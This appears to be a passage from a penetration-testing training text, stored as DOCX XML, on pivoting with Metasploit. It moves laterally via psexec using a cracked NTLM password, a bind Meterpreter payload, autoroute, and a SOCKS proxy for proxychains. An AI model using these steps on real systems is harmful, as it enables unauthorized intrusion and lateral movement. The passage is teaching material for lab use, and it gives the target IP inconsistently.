              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image248.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4633578" cy="2710346"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="839"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000592">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000593">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000594">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 77 shows that 172.161.5.200 has ports 445 and 3389 open. Let's use two modules for SMB and RDP using our pivot host ITWK01 to perform operations on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000595">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we'll attempt to use the</w:t>
      </w:r>
      <w:hyperlink r:id="rId135">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId136">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">psexec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to get access on the second target as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the previous section, we retrieved the NTLM hash via Kiwi. Let's assume we could successfully crack the NTLM hash and the clear-text password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoccieDearAeroMeow1!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to succeed, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has to be a local administrator on the second machine. For this example, let's also assume that we confirmed this through information gathering techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000596">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/smb/psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBUser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBPass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoccieDearAeroMeow1!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000597">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's important to note that the added route will only work with established connections. Because of this, the new shell on the target must be a bind shell such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thus allowing us to use the set route to connect to it. A reverse shell payload would not be able to find its way back to our attacking system in most situations because the target does not have a route defined for our network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000598">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5235253" cy="3062288"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="360" name="image352.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image352.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5235253" cy="3062288"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="716"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that all options are set, we can launch the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 79 shows that we successfully used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit module to obtain a Meterpreter shell on the second target via the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an alternative to adding routes manually, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> post-exploitation module to set up pivot routes through an existing Meterpreter session automatically. To demonstrate the usage of this module, we first need to remove the route we set manually. Let's terminate the Meterpreter session created through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module and remove all routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route flush</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the only session left is the Meterpreter session created by executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, the result of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> states that there are no routes defined. Next, let's activate the module </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which we must set the session ID as value for the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, let's enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5191752" cy="5557838"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image64.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image64.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191752" cy="5557838"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 80 shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> added 172.16.5.0/24 to the routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could now use the psexec module as we did before, but we can also combine routes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server/socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary module to configure a</w:t>
      </w:r>
      <w:hyperlink r:id="rId139">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId140">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SOCKS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy. This allows applications outside of the Metasploit Framework to tunnel through the pivot on port 1080 by default. We set the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SRVHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to use SOCKS version 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5004864" cy="4595813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="546" name="image522.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image522.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5004864" cy="4595813"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now update our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
